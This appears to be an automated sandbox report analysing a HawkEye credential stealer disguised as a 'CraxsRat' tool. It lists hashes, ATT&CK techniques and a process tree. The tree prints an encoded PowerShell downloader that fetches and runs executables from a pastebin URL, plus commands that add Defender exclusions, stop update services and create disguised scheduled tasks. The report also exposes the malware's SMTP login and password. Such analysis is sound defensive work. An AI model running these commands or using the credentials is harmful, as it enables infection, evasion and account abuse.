hawkeye | 45be476ac2e619069661f9bdf5797ffb5c6675ae6c50028013cec9dfdb7bb5ed

Analysis

max time kernel
43s
max time network
72s
platform
windows10-2004_x64
resource
win10v2004-20230221-en
resource tags

arch:x64arch:x86image:win10v2004-20230221-enlocale:en-usos:windows10-2004-x64system
submitted
25-04-2023 19:25

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

CraxsRat 4.0.1/CraxsRat 4.0.1.exe
Size

3.6MB
MD5

7b9bf5ac7525280dbed9fdf0bf198162
SHA1

9cb029963e7879f77cc42a17f1f0866ddeeb9a67
SHA256

8146672d7c61bd23e4f6f2fb37e0f2cb39dcd0b899189e48d25994ea3ad55890
SHA512

9b9dc4c8b2d865b7f526fe7af0803ff92bc1715621e1227b455c82f13aaf03451116c877c7d64460909713e3c6a2b40b7c7ffd32df7927d92a768563ba48ca45
SSDEEP

49152:tWsTEkwghTKv4jysGUqgCoOtt1JKsgGViSe8KuAfG9b/KM7:tFEkwghTKv4jysGUqgCxttdX8v/E1

Score

10^/10

hawkeye collection evasion keylogger persistence spyware stealer trojan

Malware Config

Extracted

Language

ps1

Source

URLs

ps1.dropper

https://pastebin.com/raw/tPAFrSUD

Extracted

Credentials

Protocol: smtp
Host:
smtp.zoho.com
Port:
587
Username:
nexusbuscasg@zohomail.com
Password:
Nescau71#

Signatures

HawkEye
HawkEye is a malware kit that has seen continuous development since at least 2013.
keylogger trojan stealer spyware hawkeye
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

Processes:

2p24wb0f.dwj1.exe

description pid process target process

PID 3260 created 760 3260 2p24wb0f.dwj1.exe Explorer.EXE

description	pid	process	target process
PID 3260 created 760	3260	2p24wb0f.dwj1.exe	Explorer.EXE

NirSoft MailPassView 4 IoCs

Password recovery tool for various email clients

Processes:

resource	yara_rule
behavioral3/memory/628-165-0x0000000000400000-0x0000000000484000-memory.dmp	MailPassView
behavioral3/memory/1448-222-0x0000000000400000-0x000000000041B000-memory.dmp	MailPassView
behavioral3/memory/1448-224-0x0000000000400000-0x000000000041B000-memory.dmp	MailPassView
behavioral3/memory/1448-226-0x0000000000400000-0x000000000041B000-memory.dmp	MailPassView

NirSoft WebBrowserPassView 4 IoCs

Password recovery tool for various web browsers

Processes:

resource	yara_rule
behavioral3/memory/628-165-0x0000000000400000-0x0000000000484000-memory.dmp	WebBrowserPassView
behavioral3/memory/248-274-0x0000000000400000-0x0000000000458000-memory.dmp	WebBrowserPassView
behavioral3/memory/248-277-0x0000000000400000-0x0000000000458000-memory.dmp	WebBrowserPassView
behavioral3/memory/248-291-0x0000000000400000-0x0000000000458000-memory.dmp	WebBrowserPassView

Nirsoft 7 IoCs

Processes:

resource	yara_rule
behavioral3/memory/628-165-0x0000000000400000-0x0000000000484000-memory.dmp	Nirsoft
behavioral3/memory/1448-222-0x0000000000400000-0x000000000041B000-memory.dmp	Nirsoft
behavioral3/memory/1448-224-0x0000000000400000-0x000000000041B000-memory.dmp	Nirsoft
behavioral3/memory/1448-226-0x0000000000400000-0x000000000041B000-memory.dmp	Nirsoft
behavioral3/memory/248-274-0x0000000000400000-0x0000000000458000-memory.dmp	Nirsoft
behavioral3/memory/248-277-0x0000000000400000-0x0000000000458000-memory.dmp	Nirsoft
behavioral3/memory/248-291-0x0000000000400000-0x0000000000458000-memory.dmp	Nirsoft

Blocklisted process makes network request 2 IoCs

Processes:

powershell.exe

flow pid process

26 3696 powershell.exe
28 3696 powershell.exe
Downloads MZ/PE file
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

flow	pid	process
26	3696	powershell.exe
28	3696	powershell.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

CraxsRat 4.0.1.exeLXIX.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\Control Panel\International\Geo\Nation	CraxsRat 4.0.1.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\Control Panel\International\Geo\Nation	LXIX.exe

Drops startup file 1 IoCs

Processes:

CraxsRat 4.0.1.exe

description ioc process

File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\%startupname%.lnk CraxsRat 4.0.1.exe
Executes dropped EXE 6 IoCs

Processes:

CraxsRat 4.0.1.exeLXIX.exeCraxsRat 4.0.1.exe2p24wb0f.dwj0.exe2p24wb0f.dwj1.exe2p24wb0f.dwj2.exe

pid process

1620 CraxsRat 4.0.1.exe
1380 LXIX.exe
628 CraxsRat 4.0.1.exe
4808 2p24wb0f.dwj0.exe
3260 2p24wb0f.dwj1.exe
3484 2p24wb0f.dwj2.exe
Uses the VBS compiler for execution 1 TTPs

Scripting
T1064

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\%startupname%.lnk	CraxsRat 4.0.1.exe

pid	process
1620	CraxsRat 4.0.1.exe
1380	LXIX.exe
628	CraxsRat 4.0.1.exe
4808	2p24wb0f.dwj0.exe
3260	2p24wb0f.dwj1.exe
3484	2p24wb0f.dwj2.exe

Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs

collection

Email Collection

T1114

Processes:

vbc.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts	vbc.exe

Adds Run key to start application 2 TTPs 3 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

CraxsRat 4.0.1.exe2p24wb0f.dwj2.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Update = "C:\\Users\\Admin\\AppData\\Roaming\\WindowsUpdate.exe"	CraxsRat 4.0.1.exe
Key created	\REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\Software\Microsoft\Windows\CurrentVersion\Run	2p24wb0f.dwj2.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsHostProcessor = "\"C:\\Users\\Admin\\AppData\\Roaming\\WindowsHostProcessor\\WindowsHostProcessor.exe\" "	2p24wb0f.dwj2.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

18 whatismyipaddress.com
20 whatismyipaddress.com

flow	ioc
18	whatismyipaddress.com
20	whatismyipaddress.com

Suspicious use of SetThreadContext 3 IoCs

Processes:

CraxsRat 4.0.1.exeCraxsRat 4.0.1.exe

description	pid	process	target process
PID 1620 set thread context of 628	1620	CraxsRat 4.0.1.exe	CraxsRat 4.0.1.exe
PID 628 set thread context of 1448	628	CraxsRat 4.0.1.exe	vbc.exe
PID 628 set thread context of 248	628	CraxsRat 4.0.1.exe	vbc.exe

Launches sc.exe 5 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exe

pid process

2740 sc.exe
380 sc.exe
4952 sc.exe
4192 sc.exe
2796 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

pid	process
2740	sc.exe
380	sc.exe
4952	sc.exe
4192	sc.exe
2796	sc.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exeCraxsRat 4.0.1.exepowershell.exe

pid	process
3696	powershell.exe
3696	powershell.exe
628	CraxsRat 4.0.1.exe
628	CraxsRat 4.0.1.exe
628	CraxsRat 4.0.1.exe
628	CraxsRat 4.0.1.exe
628	CraxsRat 4.0.1.exe
628	CraxsRat 4.0.1.exe
4324	powershell.exe
628	CraxsRat 4.0.1.exe
628	CraxsRat 4.0.1.exe
4324	powershell.exe
628	CraxsRat 4.0.1.exe
628	CraxsRat 4.0.1.exe
628	CraxsRat 4.0.1.exe
628	CraxsRat 4.0.1.exe
628	CraxsRat 4.0.1.exe
628	CraxsRat 4.0.1.exe
628	CraxsRat 4.0.1.exe
628	CraxsRat 4.0.1.exe
628	CraxsRat 4.0.1.exe
628	CraxsRat 4.0.1.exe
628	CraxsRat 4.0.1.exe
628	CraxsRat 4.0.1.exe
628	CraxsRat 4.0.1.exe
628	CraxsRat 4.0.1.exe
628	CraxsRat 4.0.1.exe
628	CraxsRat 4.0.1.exe
628	CraxsRat 4.0.1.exe
628	CraxsRat 4.0.1.exe
628	CraxsRat 4.0.1.exe
628	CraxsRat 4.0.1.exe
628	CraxsRat 4.0.1.exe
628	CraxsRat 4.0.1.exe
628	CraxsRat 4.0.1.exe
628	CraxsRat 4.0.1.exe
628	CraxsRat 4.0.1.exe
628	CraxsRat 4.0.1.exe
628	CraxsRat 4.0.1.exe
628	CraxsRat 4.0.1.exe
628	CraxsRat 4.0.1.exe
628	CraxsRat 4.0.1.exe
628	CraxsRat 4.0.1.exe
628	CraxsRat 4.0.1.exe
628	CraxsRat 4.0.1.exe
628	CraxsRat 4.0.1.exe
628	CraxsRat 4.0.1.exe
628	CraxsRat 4.0.1.exe
628	CraxsRat 4.0.1.exe
628	CraxsRat 4.0.1.exe
628	CraxsRat 4.0.1.exe
628	CraxsRat 4.0.1.exe
628	CraxsRat 4.0.1.exe
628	CraxsRat 4.0.1.exe
628	CraxsRat 4.0.1.exe
628	CraxsRat 4.0.1.exe
628	CraxsRat 4.0.1.exe
628	CraxsRat 4.0.1.exe
628	CraxsRat 4.0.1.exe
628	CraxsRat 4.0.1.exe
628	CraxsRat 4.0.1.exe
628	CraxsRat 4.0.1.exe
628	CraxsRat 4.0.1.exe
628	CraxsRat 4.0.1.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

Processes:

powershell.exeCraxsRat 4.0.1.exepowershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	3696	powershell.exe
Token: SeDebugPrivilege	628	CraxsRat 4.0.1.exe
Token: SeDebugPrivilege	4324	powershell.exe
Token: SeDebugPrivilege	1068	powershell.exe

Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

CraxsRat 4.0.1.exe

pid process

628 CraxsRat 4.0.1.exe

pid	process
628	CraxsRat 4.0.1.exe

Suspicious use of WriteProcessMemory 44 IoCs

Processes:

CraxsRat 4.0.1.exeLXIX.exeCraxsRat 4.0.1.exepowershell.exeCraxsRat 4.0.1.exe

description	pid	process	target process
PID 4840 wrote to memory of 1620	4840	CraxsRat 4.0.1.exe	CraxsRat 4.0.1.exe
PID 4840 wrote to memory of 1620	4840	CraxsRat 4.0.1.exe	CraxsRat 4.0.1.exe
PID 4840 wrote to memory of 1620	4840	CraxsRat 4.0.1.exe	CraxsRat 4.0.1.exe
PID 4840 wrote to memory of 1380	4840	CraxsRat 4.0.1.exe	LXIX.exe
PID 4840 wrote to memory of 1380	4840	CraxsRat 4.0.1.exe	LXIX.exe
PID 4840 wrote to memory of 1380	4840	CraxsRat 4.0.1.exe	LXIX.exe
PID 1380 wrote to memory of 3696	1380	LXIX.exe	powershell.exe
PID 1380 wrote to memory of 3696	1380	LXIX.exe	powershell.exe
PID 1380 wrote to memory of 3696	1380	LXIX.exe	powershell.exe
PID 1620 wrote to memory of 628	1620	CraxsRat 4.0.1.exe	CraxsRat 4.0.1.exe
PID 1620 wrote to memory of 628	1620	CraxsRat 4.0.1.exe	CraxsRat 4.0.1.exe
PID 1620 wrote to memory of 628	1620	CraxsRat 4.0.1.exe	CraxsRat 4.0.1.exe
PID 1620 wrote to memory of 628	1620	CraxsRat 4.0.1.exe	CraxsRat 4.0.1.exe
PID 1620 wrote to memory of 628	1620	CraxsRat 4.0.1.exe	CraxsRat 4.0.1.exe
PID 1620 wrote to memory of 628	1620	CraxsRat 4.0.1.exe	CraxsRat 4.0.1.exe
PID 1620 wrote to memory of 628	1620	CraxsRat 4.0.1.exe	CraxsRat 4.0.1.exe
PID 1620 wrote to memory of 628	1620	CraxsRat 4.0.1.exe	CraxsRat 4.0.1.exe
PID 3696 wrote to memory of 4324	3696	powershell.exe	powershell.exe
PID 3696 wrote to memory of 4324	3696	powershell.exe	powershell.exe
PID 3696 wrote to memory of 4324	3696	powershell.exe	powershell.exe
PID 628 wrote to memory of 1448	628	CraxsRat 4.0.1.exe	vbc.exe
PID 628 wrote to memory of 1448	628	CraxsRat 4.0.1.exe	vbc.exe
PID 628 wrote to memory of 1448	628	CraxsRat 4.0.1.exe	vbc.exe
PID 628 wrote to memory of 1448	628	CraxsRat 4.0.1.exe	vbc.exe
PID 628 wrote to memory of 1448	628	CraxsRat 4.0.1.exe	vbc.exe
PID 628 wrote to memory of 1448	628	CraxsRat 4.0.1.exe	vbc.exe
PID 628 wrote to memory of 1448	628	CraxsRat 4.0.1.exe	vbc.exe
PID 628 wrote to memory of 1448	628	CraxsRat 4.0.1.exe	vbc.exe
PID 628 wrote to memory of 1448	628	CraxsRat 4.0.1.exe	vbc.exe
PID 3696 wrote to memory of 4808	3696	powershell.exe	2p24wb0f.dwj0.exe
PID 3696 wrote to memory of 4808	3696	powershell.exe	2p24wb0f.dwj0.exe
PID 3696 wrote to memory of 3260	3696	powershell.exe	2p24wb0f.dwj1.exe
PID 3696 wrote to memory of 3260	3696	powershell.exe	2p24wb0f.dwj1.exe
PID 3696 wrote to memory of 3484	3696	powershell.exe	2p24wb0f.dwj2.exe
PID 3696 wrote to memory of 3484	3696	powershell.exe	2p24wb0f.dwj2.exe
PID 628 wrote to memory of 248	628	CraxsRat 4.0.1.exe	vbc.exe
PID 628 wrote to memory of 248	628	CraxsRat 4.0.1.exe	vbc.exe
PID 628 wrote to memory of 248	628	CraxsRat 4.0.1.exe	vbc.exe
PID 628 wrote to memory of 248	628	CraxsRat 4.0.1.exe	vbc.exe
PID 628 wrote to memory of 248	628	CraxsRat 4.0.1.exe	vbc.exe
PID 628 wrote to memory of 248	628	CraxsRat 4.0.1.exe	vbc.exe
PID 628 wrote to memory of 248	628	CraxsRat 4.0.1.exe	vbc.exe
PID 628 wrote to memory of 248	628	CraxsRat 4.0.1.exe	vbc.exe
PID 628 wrote to memory of 248	628	CraxsRat 4.0.1.exe	vbc.exe

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:760

C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1\CraxsRat 4.0.1.exe
"C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1\CraxsRat 4.0.1.exe"
2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4840

C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe
"C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe"
3⤵
- Drops startup file
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1620

C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe
"C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe"
4⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:628

C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\Admin\AppData\Local\Temp\holdermail.txt"
5⤵
- Accesses Microsoft Outlook accounts
PID:1448

C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\Admin\AppData\Local\Temp\holderwb.txt"
5⤵
PID:248

C:\Users\Admin\AppData\Local\Temp\LXIX.exe
"C:\Users\Admin\AppData\Local\Temp\LXIX.exe"
3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1380

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAYgBnACMAPgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAIgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAGwAcgBmACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAG0AZgBrACMAPgA7ACIAOwA8ACMAbQBxAHgAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBwAHAAYQAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBjAGYAYQAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwB5AGoAdAAjAD4AOwAkAHcAYwAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQA7ACQAbABuAGsAIAA9ACAAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwBwAGEAcwB0AGUAYgBpAG4ALgBjAG8AbQAvAHIAYQB3AC8AdABQAEEARgByAFMAVQBEACcAKQAuAFMAcABsAGkAdAAoAFsAcwB0AHIAaQBuAGcAWwBdAF0AIgBgAHIAYABuACIALAAgAFsAUwB0AHIAaQBuAGcAUwBwAGwAaQB0AE8AcAB0AGkAbwBuAHMAXQA6ADoATgBvAG4AZQApADsAIAAkAGYAbgAgAD0AIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABhAHQAaABdADoAOgBHAGUAdABSAGEAbgBkAG8AbQBGAGkAbABlAE4AYQBtAGUAKAApADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIAAkAHcAYwAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJABsAG4AawBbACQAaQBdACwAIAA8ACMAcwBzAGgAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwB4AGoAZgAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBrAHgAZwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAKAAkAGYAbgAgACsAIAAkAGkALgBUAG8AUwB0AHIAaQBuAGcAKAApACAAKwAgACcALgBlAHgAZQAnACkAKQApACAAfQA8ACMAcgB0AGsAIwA+ADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAdwBtAHkAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGYAYQBuACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAoACQAZgBuACAAKwAgACQAaQAuAFQAbwBTAHQAcgBpAG4AZwAoACkAIAArACAAJwAuAGUAeABlACcAKQApACAAfQAgADwAIwBmAGcAZgAjAD4A"
4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3696

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-Type -AssemblyName System.Windows.Forms;<#lrf#>[System.Windows.Forms.MessageBox]::Show('','','OK','Error')<#mfk#>;
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4324

C:\Users\Admin\AppData\Roaming\2p24wb0f.dwj0.exe
"C:\Users\Admin\AppData\Roaming\2p24wb0f.dwj0.exe"
5⤵
- Executes dropped EXE
PID:4808

C:\Users\Admin\AppData\Roaming\2p24wb0f.dwj1.exe
"C:\Users\Admin\AppData\Roaming\2p24wb0f.dwj1.exe"
5⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
PID:3260

C:\Users\Admin\AppData\Roaming\2p24wb0f.dwj2.exe
"C:\Users\Admin\AppData\Roaming\2p24wb0f.dwj2.exe"
5⤵
- Executes dropped EXE
- Adds Run key to start application
PID:3484

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1068

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
2⤵
PID:2176

C:\Windows\System32\sc.exe
sc stop UsoSvc
3⤵
- Launches sc.exe
PID:2740

C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
3⤵
- Launches sc.exe
PID:380

C:\Windows\System32\sc.exe
sc stop wuauserv
3⤵
- Launches sc.exe
PID:4952

C:\Windows\System32\sc.exe
sc stop bits
3⤵
- Launches sc.exe
PID:4192

C:\Windows\System32\sc.exe
sc stop dosvc
3⤵
- Launches sc.exe
PID:2796

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
2⤵
PID:2160

C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
3⤵
PID:1492

C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
3⤵
PID:1188

C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-ac 0
3⤵
PID:4420

C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-dc 0
3⤵
PID:2012

C:\Windows\System32\dialer.exe
C:\Windows\System32\dialer.exe
2⤵
PID:3892

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#hgkvzf#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineCPS' /tr '''C:\Program Files\Google\Chrome\updaters.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updaters.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineCPS' -User 'System' -RunLevel 'Highest' -Force; }
2⤵
PID:2824

C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineCPS"
2⤵
PID:1700

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scripting

T1064

Persistence

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Impair Defenses

T1562

Scripting

T1064

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Email Collection

T1114

Exfiltration

Command and Control

Web Service

T1102

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
Filesize
1KB

MD5
4cc9e7069534f7bcbb90ad7cac69ed78

SHA1
a3522b9edd4a7d28ad0ac0e1b659a82b6dc10892

SHA256
4814be12fd2320cd9249d3b2611ea1421cb88823097fcbf0ca697e6e9ac93c9c

SHA512
e408e0abb3b7166578c075d10f1378d6a6b39dc386361a4df23abc026e9a634bfb16c01daf9b8fcbe8555e335d93c8c9d8442a11c187df616f2d6cdd3ab53653

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
19KB

MD5
e789a85b5e2f00da0ddd50f33b63e43f

SHA1
dd422a3d5e62ff06afb942f3260f2f6726519b58

SHA256
a03c756efaf19a284b389c040fef97b90562b62cd38ef7114b7341aaaae560bf

SHA512
f3386a3ec95cf61692e843b6adfe331b9d6eb31c430a6c7b46318c7c7d1fa85195a2255f163622579fa60e0cf6d2a7c70306f97da25eaf3238ee6137818af2e2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
19KB

MD5
e789a85b5e2f00da0ddd50f33b63e43f

SHA1
dd422a3d5e62ff06afb942f3260f2f6726519b58

SHA256
a03c756efaf19a284b389c040fef97b90562b62cd38ef7114b7341aaaae560bf

SHA512
f3386a3ec95cf61692e843b6adfe331b9d6eb31c430a6c7b46318c7c7d1fa85195a2255f163622579fa60e0cf6d2a7c70306f97da25eaf3238ee6137818af2e2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
948B

MD5
17b97615d40fe69625e737e1933cb33e

SHA1
ef8d45492225e21d6f3a7c4a93a950ce586e3975

SHA256
ef7d503547d6e26552919238f3665ebae15f72354a6adf7d1caad23242ca4120

SHA512
2adfaadbced4d191c62dc61df9497cd461e7e665e6c56803110778f862c8d06122e8072558e3c73145f29b246fd9d5a86080af4726c39dc09cd23927efd137f7

Download Submit
C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe
Filesize
3.4MB

MD5
f873bee92e6118ff16b63b2a75173818

SHA1
4061cab004813a12e8042b83228885dfbc88547f

SHA256
7eba1b2ac702b41a3799b7c0c0a2a5a9da452e21fb847d0d8d0884f7705b5b4d

SHA512
368858286de1b7a5509e3a6576f4b58919f1dbf73b97a39d1dc62faad797c15f7fbcd09cf6cc37cb138c00ecd138ae01abf93b02fa33ce86f658a2a8d213850f

Download Submit
C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe
Filesize
3.4MB

MD5
f873bee92e6118ff16b63b2a75173818

SHA1
4061cab004813a12e8042b83228885dfbc88547f

SHA256
7eba1b2ac702b41a3799b7c0c0a2a5a9da452e21fb847d0d8d0884f7705b5b4d

SHA512
368858286de1b7a5509e3a6576f4b58919f1dbf73b97a39d1dc62faad797c15f7fbcd09cf6cc37cb138c00ecd138ae01abf93b02fa33ce86f658a2a8d213850f

Download Submit
C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe
Filesize
3.4MB

MD5
f873bee92e6118ff16b63b2a75173818

SHA1
4061cab004813a12e8042b83228885dfbc88547f

SHA256
7eba1b2ac702b41a3799b7c0c0a2a5a9da452e21fb847d0d8d0884f7705b5b4d

SHA512
368858286de1b7a5509e3a6576f4b58919f1dbf73b97a39d1dc62faad797c15f7fbcd09cf6cc37cb138c00ecd138ae01abf93b02fa33ce86f658a2a8d213850f

Download Submit
C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe
Filesize
3.4MB

MD5
f873bee92e6118ff16b63b2a75173818

SHA1
4061cab004813a12e8042b83228885dfbc88547f

SHA256
7eba1b2ac702b41a3799b7c0c0a2a5a9da452e21fb847d0d8d0884f7705b5b4d

SHA512
368858286de1b7a5509e3a6576f4b58919f1dbf73b97a39d1dc62faad797c15f7fbcd09cf6cc37cb138c00ecd138ae01abf93b02fa33ce86f658a2a8d213850f

Download Submit
C:\Users\Admin\AppData\Local\Temp\LXIX.exe
Filesize
73KB

MD5
decf4a367597bd686ed151ee5af53fdb

SHA1
7e6c4789ee9456d3981997e5392b229c1c070e8c

SHA256
c977dcc0c0d1e06083f2d0ae0492afa832757afc8969c12d93ff423f3647175a

SHA512
